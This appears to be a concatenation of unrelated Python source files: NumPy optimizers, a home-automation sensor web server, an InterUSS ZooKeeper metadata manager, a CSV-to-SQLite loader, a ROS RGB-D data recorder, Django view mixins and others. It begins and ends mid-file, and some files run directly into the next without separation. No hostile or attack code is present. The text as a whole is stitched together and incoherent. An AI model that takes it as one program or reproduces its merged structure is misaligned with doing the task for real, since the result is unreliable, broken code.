= epsilon self.cache = None self.iterations = 0 def update(self, params, grads): # init cache if self.cache is None: self.cache = [_zero(p.shape) for p in params] # update parameters for i, (c, p, g) in enumerate(zip(self.cache, params, grads)): c = self.rho * c + (1 - self.rho) * np.power(g, 2) p -= (self.lr * g / np.sqrt(c + self.epsilon)) self.cache[i] = c class Adadelta(Optimizer): def __init__(self, rho=0.9, epsilon=1e-6, *args, **kwargs): super(Adadelta, self).__init__(*args, **kwargs) self.rho = rho self.epsilon = epsilon self.cache = None self.delta = None def update(self, params, grads): # init cache and delta if self.cache is None: self.cache = [_zero(p.shape) for p in params] if self.delta is None: self.delta = [_zero(p.shape) for p in params] # update parameters for i, (c, d, p, g) in enumerate(zip(self.cache, self.delta, params, grads)): c = self.rho * c + (1 - self.rho) * np.power(g, 2) update = g * np.sqrt(d + self.epsilon) / np.sqrt(c + self.epsilon) p -= self.lr * update d = self.rho * d + (1 - self.rho) * np.power(update, 2) self.cache[i] = c self.delta[i] = d class Adam(Optimizer): def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, *args, **kwargs): super(Adam, self).__init__(*args, **kwargs) self.beta1 = beta1 self.beta2 = beta2 self.epsilon = epsilon self.ms = None self.vs = None def update(self, params, grads): # init self.iterations += 1 a_t = self.lr * np.sqrt(1 - np.power(self.beta2, self.iterations)) / \ (1 - np.power(self.beta1, self.iterations)) if self.ms is None: self.ms = [_zero(p.shape) for p in params] if self.vs is None: self.vs = [_zero(p.shape) for p in params] # update parameters for i, (m, v, p, g) in enumerate(zip(self.ms, self.vs, params, grads)): m = self.beta1 * m + (1 - self.beta1) * g v = self.beta2 * v + (1 - self.beta2) * np.power(g, 2) p -= a_t * m / (np.sqrt(v) + self.epsilon) self.ms[i] = m self.vs[i] = v class Adamax(Optimizer): def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, *args, **kwargs): super(Adamax, self).__init__(*args, **kwargs) self.beta1 = beta1 self.beta2 = beta2 self.epsilon = epsilon self.ms = None self.vs = None def update(self, params, grads): # init self.iterations += 1 a_t = self.lr / (1 - np.power(self.beta1, self.iterations)) if self.ms is None: self.ms = [_zero(p.shape) for p in params] if self.vs is None: self.vs = [_zero(p.shape) for p in params] # update parameters for i, (m, v, p, g) in enumerate(zip(self.ms, self.vs, params, grads)): m = self.beta1 * m + (1 - self.beta1) * g v = np.maximum(self.beta2 * v, np.abs(g)) p -= a_t * m / (v + self.epsilon) self.ms[i] = m self.vs[i] = v def npdl_clip(grad, boundary): if boundary > 0: return np.clip(grad, -boundary, boundary) else: return grad def get(optimizer): if optimizer.__class__.__name__ == 'str': if optimizer in ['sgd', 'SGD']: return SGD() if optimizer in ['momentum', 'Momentum']: return Momentum() if optimizer in ['nesterov_momentum', 'NesterovMomentum']: return NesterovMomentum() if optimizer in ['adagrad', 'Adagrad']: return Adagrad() if optimizer in ['rmsprop', 'RMSprop']: return RMSprop() if optimizer in ['adadelta', 'Adadelta']: return Adadelta() if optimizer in ['adam', 'Adam']: return Adam() if optimizer in ['adamax', 'Adamax']: return Adamax() raise ValueError('Unknown optimizer name: {}.'.format(optimizer)) elif isinstance(optimizer, Optimizer): return copy.deepcopy(optimizer) else: raise ValueError("Unknown type: {}.".format(optimizer.__class__.__name__)) dmitry-root/home-automation #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import sys from http.server import HTTPServer, SimpleHTTPRequestHandler import logging import json import threading import time sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../lib')) from pidev.monitor import SensorsMonitor from pidev.periodic import PeriodicTimer import pidev.config class PeriodicMonitor: _pers_interval = 60.0 * 60.0 # 1 hour def __init__(self, temp_file, pers_file, interval, config): self.temp_file = temp_file self.pers_file = pers_file self.interval = interval self._load() self._save_file(self.temp_file) self._timer = PeriodicTimer(self.interval, self._update) self._monitor = SensorsMonitor(config) self._lock = threading.Lock() def start(self): with self._lock: self._monitor.start() self._timer.start() self._time = time.clock_gettime(time.CLOCK_MONOTONIC) self._pers_time = self._time def stop(self): with self._lock: self._monitor.stop() self._timer.stop() def _load(self): if not self._load_file(self.temp_file): self._load_file(self.pers_file) self._data = {} self._data['temp'] = {} self._data['flow'] = {} self._data.setdefault('consumption', {}) def _load_file(self, file): try: with open(file) as fd: self._data = json.load(fd) except: return False return True def _save_file(self, file): tmp_file = file + '.tmp' try: with open(tmp_file, 'w') as fd: json.dump(self._data, fd, sort_keys=True, indent=4) os.rename(tmp_file, file) except: logging.error("failed to save data into file: '%s', error: '%s'" % (file, sys.exc_info()[0])) finally: try: os.unlink(tmp_file) except: pass def _update(self): with self._lock: self._do_update() def _do_update(self): now = time.clock_gettime(time.CLOCK_MONOTONIC) seconds_passed = now - self._time self._time = now data = self._monitor.collect(seconds_passed) self._data['temp'] = data.temp self._data['flow'] = data.flow for key, value in data.consumption.items(): self._data['consumption'].setdefault(key, 0.0) self._data['consumption'][key] += value self._save_file(self.temp_file) if now > self._pers_time + PeriodicMonitor._pers_interval: self._pers_time = now self._save_file(self.pers_file) if __name__ == '__main__': config = pidev.config.read('websensor.json') prefix = pidev.config.prefix() # Default configuration port = 8000 interval = 30.0 temp_dir = '/tmp/websensor' pers_dir = '/var/www/websensor' file = 'sensordata.json' if 'websensor' in config: wconfig = config['websensor'] try: port = int(wconfig.get('port', port)) interval = float(wconfig.get('interval', interval)) temp_dir = wconfig.get('temporary_directory', temp_dir) pers_dir = wconfig.get('persistent_directory', pers_dir) except: logging.error("error parsing websensor config: %s" % sys.exc_info()[0]) os.chdir(temp_dir) temp_file = temp_dir + '/' + file pers_file = pers_dir + '/' + file monitor = PeriodicMonitor(temp_file, pers_file, interval, config) server = HTTPServer(('', port), SimpleHTTPRequestHandler) logging.info("starting websensor at port: %d" % port) monitor.start() server.serve_forever() monitor.stop() logging.info("websensor stopped") """The InterUSS Platform Data Node storage API server. This flexible and distributed system is used to connect multiple USSs operating in the same general area to share safety information while protecting the privacy of USSs, businesses, operator and consumers. The system is focused on facilitating communication amongst actively operating USSs with no details about UAS operations stored or processed on the InterUSS Platform. A data node contains all of the API, logic, and data consistency infrastructure required to perform CRUD (Create, Read, Update, Delete) operations on specific grid cells. Multiple data nodes can be executed to increase resilience and availability. This is achieved by a stateless API to service USSs, an information interface to translate grid cell USS information into the correct data storage format, and an information consistency store to ensure data is up to date. This module is the information interface to Zookeeper. Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the 'License'); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import json import logging # Our data structure for the actual metadata stored import uss_metadata # Utilties for validating slippy import slippy_util # Kazoo is the zookeeper wrapper for python from kazoo.client import KazooClient from kazoo.exceptions import KazooException from kazoo.exceptions import BadVersionError from kazoo.exceptions import NoNodeError from kazoo.exceptions import RolledBackError from kazoo.handlers.threading import KazooTimeoutError from kazoo.protocol.states import KazooState # logging is our log infrastructure used for this application logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO) log = logging.getLogger('InterUSS_DataNode_InformationInterface') # CONSTANTS # Lock stores in this format /uss/gridcells/{z}/{x}/{y}/manifest USS_BASE_PREFIX = '/uss/gridcells/' TEST_BASE_PREFIX = '/test/' USS_METADATA_FILE = '/manifest' BAD_CHARACTER_CHECK = '\';(){}[]!@#$%^&*|"<>' CONNECTION_TIMEOUT = 2.5 # seconds DEFAULT_CONNECTION = 'localhost:2181' GRID_PATH = USS_BASE_PREFIX MAX_SAFE_INTEGER = 9007199254740991 class USSMetadataManager(object): """Interfaces with the locking system to get, put, and delete USS metadata. Metadata gets/stores/deletes the USS information for a partiular grid, including current version number, a list of USSs with active operations, and the endpoints to get that information. Locking is assured through a snapshot token received when getting, and used when putting. """ def __init__(self, connectionstring=DEFAULT_CONNECTION, testgroupid=None): """Initializes the class. Args: connectionstring: Zookeeper connection string - server:port,server:port,... testgroupid: ID to use if in test mode, none for normal mode """ if testgroupid: self.set_testmode(testgroupid) if not connectionstring: connectionstring = DEFAULT_CONNECTION log.debug('Creating metadata manager object and connecting to zookeeper...') try: if set(BAD_CHARACTER_CHECK) & set(connectionstring): raise ValueError self.zk = KazooClient(hosts=connectionstring, timeout=CONNECTION_TIMEOUT) self.zk.add_listener(self.zookeeper_connection_listener) self.zk.start() if testgroupid: self.delete_testdata(testgroupid) except KazooTimeoutError: log.error('Unable to connect to zookeeper using %s connection string...', connectionstring) raise except ValueError: log.error('Connection string %s seems invalid...', connectionstring) raise def __del__(self): log.debug('Destroying metadata manager object and disconnecting from zk...') self.zk.stop() def get_state(self): return self.zk.state def get_version(self): try: return True, self.zk.server_version() except KazooException as e: msg = str(e) return False, type(e).__name__ + (' ' + msg if msg else '') def set_verbose(self): log.setLevel(logging.DEBUG) def set_testmode(self, testgroupid='UNDEFINED_TESTER'): """Sets the mode to testing with the specific test ID, cannot be undone. Args: testgroupid: ID to use if in test mode, none for normal mode """ global GRID_PATH global CONNECTION_TIMEOUT # Adjust parameters specifically for the test GRID_PATH = TEST_BASE_PREFIX + testgroupid + USS_BASE_PREFIX log.debug('Setting test path to %s...', GRID_PATH) CONNECTION_TIMEOUT = 1.0 def zookeeper_connection_listener(self, state): if state == KazooState.LOST: # Register somewhere that the session was lost log.error('Lost connection with the zookeeper servers...') elif state == KazooState.SUSPENDED: # Handle being disconnected from Zookeeper log.error('Suspended connection with the zookeeper servers...') elif state == KazooState.CONNECTED: # Handle being connected/reconnected to Zookeeper log.info('Connection restored with the zookeeper servers...') def delete_testdata(self, testgroupid=None): """Removes the test data from the servers. Be careful when using this in parallel as it removes everything under the testgroupid, or everything if no tetgroupid is provided. Args: testgroupid: ID to use if in test mode, none will remove all test data """ if testgroupid: path = TEST_BASE_PREFIX + testgroupid else: path = TEST_BASE_PREFIX self.zk.delete(path, recursive=True) def get(self, z, x, y): """Gets the metadata and snapshot token for a GridCell. Reads data from zookeeper, including a snapshot token. The snapshot token is used as a reference when writing to ensure the data has not been updated between read and write. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ # TODO(hikevin): Change to use our own error codes and let the server # convert them to http error codes. For now, this is # at least in a standard JSend format. status = 500 if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: try: m = uss_metadata.USSMetadata(content) status = 200 result = { 'status': 'success', 'sync_token': metadata.last_modified_transaction_id, 'data': m.to_json() } except ValueError: status = 424 else: status = 404 else: status = 400 if status != 200: result = self._format_status_code_to_jsend(status) return result def set(self, z, x, y, sync_token, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Sets the metadata for a GridCell. Writes data, using the snapshot token for confirming data has not been updated since it was last read. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format sync_token: token retrieved in the original GET GridCellMetadata, uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ if slippy_util.validate_slippy(z, x, y): # first we have to get the cell (content, metadata) = self._get_raw(z, x, y) if metadata: # Quick check of the token, another is done on the actual set to be sure # but this check fails early and fast if str(metadata.last_modified_transaction_id) == str(sync_token): try: m = uss_metadata.USSMetadata(content) log.debug('Setting metadata for %s...', uss_id) if not m.upsert_operator(uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation, z, x, y): log.error('Failed setting operator for %s with token %s...', uss_id, str(sync_token)) raise ValueError status = self._set_raw(z, x, y, m, metadata.version) except ValueError: status = 424 else: status = 409 else: status = 404 else: status = 400 if status == 200: # Success, now get the metadata back to send back result = self.get(z, x, y) else: result = self._format_status_code_to_jsend(status) return result def delete(self, z, x, y, uss_id): """Sets the metadata for a GridCell by removing the entry for the USS. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format uss_id: is the plain text identifier for the USS Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ status = 500 if slippy_util.validate_slippy(z, x, y): # first we have to get the cell (content, metadata) = self._get_raw(z, x, y) if metadata: try: m = uss_metadata.USSMetadata(content) m.remove_operator(uss_id) # TODO(pelletierb): Automatically retry on delete status = self._set_raw(z, x, y, m, metadata.version) except ValueError: status = 424 else: status = 404 else: status = 400 if status == 200: # Success, now get the metadata back to send back (content, metadata) = self._get_raw(z, x, y) result = { 'status': 'success', 'sync_token': metadata.last_modified_transaction_id, 'data': m.to_json() } else: result = self._format_status_code_to_jsend(status) return result def get_multi(self, z, grids): """Gets the metadata and snapshot token for multiple GridCells. Reads data from zookeeper, including a composite snapshot token. The snapshot token is used as a reference when writing to ensure the data has not been updated between read and write. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ try: combined_meta, syncs = self._get_multi_raw(z, grids) log.debug('Found sync token %s for %d grids...', self._hash_sync_tokens(syncs), len(syncs)) result = { 'status': 'success', 'sync_token': self._hash_sync_tokens(syncs), 'data': combined_meta.to_json() } except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) except IndexError as e: result = self._format_status_code_to_jsend(404, e.message) return result def set_multi(self, z, grids, sync_token, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Sets multiple GridCells metadata at once. Writes data, using the hashed snapshot token for confirming data has not been updated since it was last read. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to update sync_token: token retrieved in the original get_multi, uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ log.debug('Setting multiple grid metadata for %s...', uss_id) try: # first, get the affected grid's sync tokens m, syncs = self._get_multi_raw(z, grids) del m # Quick check of the token, another is done on the actual set to be sure # but this check fails early and fast log.debug('Found sync token %d for %d grids...', self._hash_sync_tokens(syncs), len(syncs)) if str(self._hash_sync_tokens(syncs)) == str(sync_token): log.debug('Composite sync_token matches, continuing...') self._set_multi_raw(z, grids, syncs, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation) log.debug('Completed updating multiple grids...') else: raise KeyError('Composite sync_token has changed') combined_meta, new_syncs = self._get_multi_raw(z, grids) result = { 'status': 'success', 'sync_token': self._hash_sync_tokens(new_syncs), 'data': combined_meta.to_json() } except (KeyError, RolledBackError) as e: result = self._format_status_code_to_jsend(409, e.message) except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) except IndexError as e: result = self._format_status_code_to_jsend(404, e.message) return result def delete_multi(self, z, grids, uss_id): """Sets multiple GridCells metadata by removing the entry for the USS. Removes the operator from multiple cells. Does not return 404 on not finding the USS in a cell, since this should be a remove all type function, as some cells might have the ussid and some might not. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to delete uss_id: is the plain text identifier for the USS Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ log.debug('Deleting multiple grid metadata for %s...', uss_id) try: if not uss_id: raise ValueError('Invalid uss_id for deleting multi') for x, y in grids: if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: m = uss_metadata.USSMetadata(content) m.remove_operator(uss_id) # TODO(pelletierb): Automatically retry on delete status = self._set_raw(z, x, y, m, metadata.version) else: raise ValueError('Invalid slippy grids for lookup') result = self.get_multi(z, grids) except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) return result ###################################################################### ################ INTERNAL FUNCTIONS ######################### ###################################################################### def _get_raw(self, z, x, y): """Gets the raw content and metadata for a GridCell from zookeeper. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format Returns: content: USS metadata metadata: straight from zookeeper """ path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) log.debug('Getting metadata from zookeeper@%s...', path) try: c, m = self.zk.get(path) except NoNodeError: self.zk.ensure_path(path) c, m = self.zk.get(path) if c: log.debug('Received raw content and metadata from zookeeper: %s', c) if m: log.debug('Received raw metadata from zookeeper: %s', m) return c, m def _set_raw(self, z, x, y, m, version): """Grabs the lock and updates the raw content for a GridCell in zookeeper. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format m: metadata object to write version: the metadata version verified from the sync_token match Returns: 200 for success, 409 for conflict, 408 for unable to get the lock """ path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) try: log.debug('Setting metadata to %s...', str(m)) self.zk.set(path, json.dumps(m.to_json()), version) status = 200 except BadVersionError: log.error('Sync token updated before write for %s...', path) status = 409 return status def _get_multi_raw(self, z, grids): """Gets the raw content and metadata for multiple GridCells from zookeeper. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve Returns: content: Combined USS metadata syncs: list of sync tokens in the same order as the grids Raises: IndexError: if it cannot find anything in zookeeper ValueError: if the grid data is not in the right format """ log.debug('Getting multiple grid metadata for %s...', str(grids)) combined_meta = None syncs = [] for x, y in grids: if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: combined_meta += uss_metadata.USSMetadata(content) syncs.append(metadata.last_modified_transaction_id) else: raise IndexError('Unable to find metadata in platform') else: raise ValueError('Invalid slippy grids for lookup') if len(syncs) == 0: raise IndexError('Unable to find metadata in platform') return combined_meta, syncs def _set_multi_raw(self, z, grids, sync_tokens, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Grabs the lock and updates the raw content for multiple GridCells Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve sync_tokens: list of the sync tokens received during get operation uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Raises: IndexError: if it cannot find anything in zookeeper ValueError: if the grid data is not in the right format """ log.debug('Setting multiple grid metadata for %s...', str(grids)) try: contents = [] for i in range(len(grids)): # First, get and update them all in memory, validate the sync_token x = grids[i][0] y = grids[i][1] sync_token = sync_tokens[i] path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) (content, metadata) = self._get_raw(z, x, y) if str(metadata.last_modified_transaction_id) == str(sync_token): log.debug('Sync_token matches for %d, %d...', x, y) m = uss_metadata.USSMetadata(content) if not m.upsert_operator(uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation, z, x, y): raise ValueError('Failed to set operator content') contents.append((path, m, metadata.version)) else: log.error( 'Sync token from USS (%s) does not match token from zk (%s)...', str(sync_token), str(metadata.last_modified_transaction_id)) raise KeyError('Composite sync_token has changed') # Now, start a transaction to update them all # the version will catch any changes and roll back any attempted # updates to the grids log.debug('Starting transaction to write all grids at once...') t = self.zk.transaction() for path, m, version in contents: t.set_data(path, json.dumps(m.to_json()), version) log.debug('Committing transaction...') results = t.commit() if isinstance(results[0], RolledBackError): raise KeyError('Rolled back multi-grid transaction due to grid change') log.debug('Committed transaction successfully.') except (KeyError, ValueError, IndexError) as e: log.error('Error caught in set_multi_raw %s.', e.message) raise e def _format_status_code_to_jsend(self, status, message=None): """Formats a response based on HTTP status code. Args: status: HTTP status code message: optional message to override preset message for codes Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ if status == 200 or status == 204: result = {'status': 'success', 'code': 204, 'message': 'Empty data set.'} elif status == 400: result = { 'status': 'fail', 'code': status, 'message': 'Parameters are not following the correct format.' } elif status == 404: result = { 'status': 'fail', 'code': status, 'message': 'Unable to pull metadata from lock system.' } elif status == 408: result = { 'status': 'fail', 'code': status, 'message': 'Timeout trying to get lock.' } elif status == 409: result = { 'status': 'fail', 'code': status, 'message': 'Content in metadata has been updated since provided sync token.' } elif status == 424: result = { 'status': 'fail', 'code': status, 'message': 'Content in metadata is not following JSON format guidelines.' } else: result = { 'status': 'fail', 'code': status, 'message': 'Unknown error code occurred.' } if message: result['message'] = message return result @staticmethod def _hash_sync_tokens(syncs): """Hashes a list of sync tokens into a single, positive 64-bit int. For various languages, the limit to integers may be different, therefore we truncate to ensure the hash is the same on all implementations. """ return abs(hash(tuple(sorted(syncs)))) % MAX_SAFE_INTEGER qed-uber/ubertool import csv import sqlite3 con = sqlite3.connect(":memory:") cur = con.cursor() cur.execute("CREATE TABLE t (col1, col2);") with open('agdrift_database.csv','rb') as fin: # csv.DictReader uses first line in file for column headings by default dr = csv.DictReader(fin) # comma is default delimiter to_db = [(i['col1'], i['col2']) for i in dr] cur.executemany("INSERT INTO t (col1, col2) VALUES (?, ?);", to_db) con.commit()#!/usr/bin/env python import numpy as np import cv2 import torch import os from time import time from scipy import interpolate import rospy from cv_bridge import CvBridge, CvBridgeError from sensor_msgs.msg import Image, CameraInfo import message_filters import tf2_ros from ros_numpy import msgify, numpify import rospkg def interpolate_missing_pixels( image: np.ndarray, mask: np.ndarray, method: str = 'nearest', fill_value: int = 0 ): """ :param image: a 2D image :param mask: a 2D boolean image, True indicates missing values :param method: interpolation method, one of 'nearest', 'linear', 'cubic'. :param fill_value: which value to use for filling up data outside the convex hull of known pixel values. Default is 0, Has no effect for 'nearest'. :return: the image with missing values interpolated """ h, w = image.shape[:2] xx, yy = np.meshgrid(np.arange(w), np.arange(h)) known_x = xx[~mask] known_y = yy[~mask] known_v = image[~mask] missing_x = xx[mask] missing_y = yy[mask] interp_values = interpolate.griddata( (known_x, known_y), known_v, (missing_x, missing_y), method=method, fill_value=fill_value ) interp_image = image.copy() interp_image[missing_y, missing_x] = interp_values return interp_image class Processor: def __init__(self, height: int = 240, width: int = 320): self.bridge = CvBridge() self.tf = tf2_ros.Buffer() self.tf_sub = tf2_ros.TransformListener(self.tf) self.world_frame = 'subt' self.camera_frame = 'X1_ground_truth' # 'X1/base_link/front_realsense_optical' self.folder_name = 'explorer_x1_rgbd_traj/living_room_traj1_frei_png' self.rgb_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/rgb/') self.depth_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/depth/') self.caminfo_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/caminfo/') self.tfs_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/livingRoom1n.gt.sim') self.assocs_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/associations.txt') self.image_n = 0 self.save_data = rospy.get_param('~save_data', True) self.width, self.height = width, height if not os.path.isdir(os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}')): os.makedirs(self.rgb_path) os.makedirs(self.depth_path) os.makedirs(self.caminfo_path) # Subscribe to topics info_sub = message_filters.Subscriber('/X1/front_rgbd/optical/camera_info', CameraInfo) rgb_sub = message_filters.Subscriber('/X1/front_rgbd/optical/image_raw', Image) depth_sub = message_filters.Subscriber('/X1/front_rgbd/depth/optical/image_raw', Image) # Synchronize the topics by time ats = message_filters.ApproximateTimeSynchronizer( [rgb_sub, depth_sub, info_sub], queue_size=5, slop=0.1) ats.registerCallback(self.callback) def callback(self, rgb_msg, depth_msg, caminfo_msg): t0 = time() try: tf = self.tf.lookup_transform(self.world_frame, self.camera_frame, rospy.Time.now(), rospy.Duration.from_sec(1.0)) rospy.logdebug('Found transform in %.3f sec', time()-t0) except tf2_ros.TransformException as ex: rospy.logerr('Could not transform from world %s to camera %s: %s.', self.world_frame, self.camera_frame, ex) return try: # get rgb image rgb_image = self.bridge.imgmsg_to_cv2(rgb_msg, rgb_msg.encoding) rgb_image = np.asarray(rgb_image, dtype=np.float32) rgb_image = cv2.resize(rgb_image, (self.width, self.height), interpolation=cv2.INTER_LINEAR) # get depth image depth_image = self.bridge.imgmsg_to_cv2(depth_msg, depth_msg.encoding) depth_image = np.asarray(depth_image, dtype=np.float32) depth_image = cv2.resize(depth_image, (self.width, self.height), interpolation=cv2.INTER_NEAREST) depth_image = interpolate_missing_pixels(depth_image, mask=np.asarray(depth_image == np.inf), method='nearest', fill_value=10.0) except CvBridgeError as e: rospy.logerr(e) return # get pose T = numpify(tf.transform) # get intrinsics K = np.asarray(caminfo_msg.K, dtype=np.float32).reshape([3, 3]) assert rgb_image.shape[:2] == depth_image.shape assert T.shape == (4, 4) if self.save_data: # write images np.save(self.rgb_path + str(self.image_n) + '.npy', rgb_image) cv2.imwrite(self.rgb_path+str(self.image_n)+'.png', rgb_image) np.save(self.depth_path + str(self.image_n)+'.npy', depth_image) depth_image = 1000. * depth_image depth_image = depth_image.astype(np.uint16) cv2.imwrite(self.depth_path + str(self.image_n) + '.png', depth_image) # write intrinsics np.save(self.caminfo_path + str(self.image_n) + '.npy', K) # write associations with open(self.assocs_path, 'a') as f: f.write(str(self.image_n)+' depth/'+str(self.image_n)+'.png '+str(self.image_n)+' rgb/'+str(self.image_n)+'.png') f.write('\n') # write transformations with open(self.tfs_path, 'a') as f: for line in np.matrix(T[:3, :]): np.savetxt(f, line, fmt='%.2f') f.write('\n') self.image_n += 1 rospy.loginfo('Writing took: %.3f sec', time() - t0) if __name__ == '__main__': rospy.init_node('bag2data', log_level=rospy.DEBUG) ip = Processor() try: rospy.spin() except KeyboardInterrupt: print("Shutting down") import copy from congregation.dag.nodes.node import OpNode from congregation.datasets.relation import Relation from congregation.utils import * class NaryOpNode(OpNode): def __init__(self, name: str, out_rel: Relation, parents: set): super(NaryOpNode, self).__init__(name, out_rel) self.parents = parents class Concat(NaryOpNode): def __init__(self, out_rel: Relation, parents: list): self.check_parents(parents) super(Concat, self).__init__("concat", out_rel, set(parents)) self.ordered = parents @staticmethod def check_parents(parents: list): if len(set(parents)) != len(parents): raise Exception("Parents list passed to Concat() node has duplicates.") def is_reversible(self): return True def get_in_rels(self): return [parent.out_rel for parent in self.ordered] def replace_parent(self, old_parent: OpNode, new_parent: OpNode): super(Concat, self).replace_parent(old_parent, new_parent) idx = self.ordered.index(old_parent) self.ordered[idx] = new_parent def remove_parent(self, parent: OpNode): super(Concat, self).remove_parent(parent) idx = self.ordered.index(parent) del self.ordered[idx] def update_out_rel_cols(self): all_in_rels = self.get_in_rels() in_cols_copy = copy.deepcopy(all_in_rels[0].columns) all_trust_sets = resolve_trust_sets_from_rels(all_in_rels) all_plaintext_sets = resolve_plaintext_sets_from_rels(all_in_rels) for (i, c) in enumerate(in_cols_copy): c.trust_with = all_trust_sets[i] c.plaintext = all_plaintext_sets[i] self.out_rel.columns = in_cols_copy self.out_rel.update_columns() src/compas_hpc/linalg/linalg_cl.py from __future__ import absolute_import from __future__ import division from __future__ import print_function try: from numpy import diag from numpy import eye from numpy import float32 except: pass try: from compas.hpc import give_cl except: pass try: import pyopencl as cl except: pass __all__ = [ 'diag_cl', 'transpose_cl', 'eye_cl', ] def transpose_cl(a): """ Return the transpose of a GPUArray. Parameters ---------- a : GPUArray Array on GPU memory. Returns ------- gpuarray Tranpose of the input GPUArray. """ return a.transpose() def diag_cl(queue, a): """ Construct GPUArray diagonal. Parameters ---------- queue PyOpenCL queue. a : array, list Elements along diagonal. Returns ------- gpuarray GPUArray with inserted diagonal. """ return give_cl(queue, diag(a)) def eye_cl(queue, n): """ Create GPUArray identity matrix (ones on diagonal) of size (n x n). Parameters ---------- queue PyOpenCL queue. n : int Size of identity matrix (n x n). Returns ------- gpuarray Identity matrix (n x n) as GPUArray. """ return give_cl(queue, eye(n, dtype=float32)) # ============================================================================== # Main # ============================================================================== if __name__ == "__main__": from compas.hpc import get_cl ctx = cl.create_some_context() queue = cl.CommandQueue(ctx) a_ = give_cl(queue, [[0, 1, 2]]) print(get_cl(diag_cl(queue, [0, 1, 2]))) print(get_cl(eye_cl(queue, 3))) print(get_cl(transpose_cl(a_))) from django.views.generic import CreateView from django.views.generic import DeleteView from django.views.generic import DetailView from django.views.generic import ListView from django.views.generic import UpdateView from model_controller.mixins import ExtendedLoginRequiredMixin class CreateViewMixin(ExtendedLoginRequiredMixin, CreateView): """ This view mixin work together with CreateForm. CreateForm need require request to get current login user. """ def get_form_kwargs(self): kwargs = super(CreateViewMixin, self).get_form_kwargs() kwargs["request"] = self.request return kwargs class UpdateViewMixin(ExtendedLoginRequiredMixin, UpdateView): def get_form_kwargs(self): kwargs = super(UpdateViewMixin, self).get_form_kwargs() kwargs["request"] = self.request return kwargs class ListViewMixin(ExtendedLoginRequiredMixin, ListView): pass class DetailViewMixin(ExtendedLoginRequiredMixin, DetailView): pass class DeleteViewMixin(ExtendedLoginRequiredMixin, DeleteView): pass #!/usr/bin/env python3 """ Example usage: mididump """ import argparse import signal import time import threading import mxmidi from mxmidi import MidiEvent # Should be imported BEFORE starting threads? # TODO: is it true? try: import IPython if int(IPython.__version__.split('.')[0]) >= 5: ipython_kwargs = dict(banner1='', confirm_exit=False) else: from traitlets.config.loader import Config cfg = Config() cfg.TerminalInteractiveShell.confirm_exit = False prompt_config = cfg.PromptManager 